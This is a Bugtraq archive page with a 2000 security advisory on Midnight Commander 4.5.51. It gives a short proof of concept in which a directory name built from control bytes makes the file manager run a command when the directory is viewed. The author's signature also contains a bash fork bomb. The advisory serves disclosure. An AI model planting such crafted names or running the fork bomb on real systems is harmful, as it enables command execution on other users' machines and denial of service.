Home page logo

bugtraq logo Bugtraq mailing list archives

Midnight Commander
From: Michal Zalewski <lcamtuf () TPI PL>
Date: Tue, 28 Nov 2000 01:15:51 +0100

The Midnight Commander 4.5.51 (latest).

$ od -t x1 mcbug
0000000 03 14 77 04 0a
$ mkdir `cat mcbug`
$ mc

(try to view this directory - 'w' - 0x77 command will be executed; longer
commands might be used, as well)

Obviously, this attack requires privledged user interaction. Midnight
Commander won't display full name of the directory if it's long enough, so
these control characters can be easily hidden.

Such problems in Midnight Commander seems to appear less or more
frequently. I am affraid this pretty useful file manager should not be
used in multiuser systems, especially by root (I can recall numerous
problems with this utility last years - code execution when viewing
specific file types, code execution via mc vfs support, etc etc) :(

Workaround: well, I am affraid only code audit might help :(

Michal Zalewski [lcamtuf () tpi pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=--=> Did you know that clones never use mirrors? <=--=

  By Date           By Thread  

Current thread:
  • Midnight Commander Michal Zalewski (Nov 29)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]